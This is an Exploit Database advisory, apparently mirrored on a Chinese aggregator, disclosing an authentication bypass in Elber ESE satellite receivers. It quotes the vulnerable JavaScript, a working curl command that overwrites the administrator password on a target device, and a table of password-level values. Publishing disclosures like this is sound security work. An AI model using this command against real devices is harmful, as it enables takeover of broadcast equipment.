Elber ESE DVB-S/S2 Satellite Receiver 1.5.x – Authentication Bypass

• Exploit Database
• 16 阅读

• 作者： LiquidWorm
  日期： 2024-08-24
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/52069/

• Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass
  
  
  Vendor: Elber S.r.l.
  Product web page: https://www.elber.it
  Affected version: 1.5.179 Revision 904
  1.5.56 Revision 884
  1.229 Revision 440
  
  Summary: ESE (Elber Satellite Equipment) product line, designed for the
  high-end radio contribution and distribution market, where quality and
  reliability are most important. The Elber IRD (Integrated Receiver Decoder)
  ESE-01 offers a professional audio quality (and composite video) at an
  excellent quality/price ratio. The development of digital satellite contribution
  networks and the need to connect a large number of sites require a cheap
  but reliable and performing satellite receiver with integrated decoder.
  
  Desc: The device suffers from an authentication bypass vulnerability through
  a direct and unauthorized access to the password management functionality. The
  issue allows attackers to bypass authentication by manipulating the set_pwd
  endpoint that enables them to overwrite the password of any user within the
  system. This grants unauthorized and administrative access to protected areas
  of the application compromising the device's system security.
  
  --------------------------------------------------------------------------
  /modules/pwd.html
  ------------------
  50: function apply_pwd(level, pwd)
  51: {
  52: 	$.get("json_data/set_pwd", {lev:level, pass:pwd},
  53: 	function(data){
  54: 		//$.alert({title:'Operation',text:data});
  55: 		show_message(data);
  56: 	}).fail(function(error){
  57: 		show_message('Error ' + error.status, 'error');
  58: 	});
  59: }
  
  --------------------------------------------------------------------------
  
  Tested on: NBFM Controller
   embOS/IP
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2024-5820
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php
  
  
  18.08.2023
  
  --
  
  
  $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
  
  Ref (lev param):
  
  Level 7 = SNMP Write Community (snmp_write_pwd)
  Level 6 = SNMP Read Community (snmp_read_pwd)
  Level 5 = Custom Password? hidden. (custom_pwd)
  Level 4 = Display Password (display_pwd)?
  Level 2 = Administrator Password (admin_pwd)
  Level 1 = Super User Password (puser_pwd)
  Level 0 = User Password (user_pwd)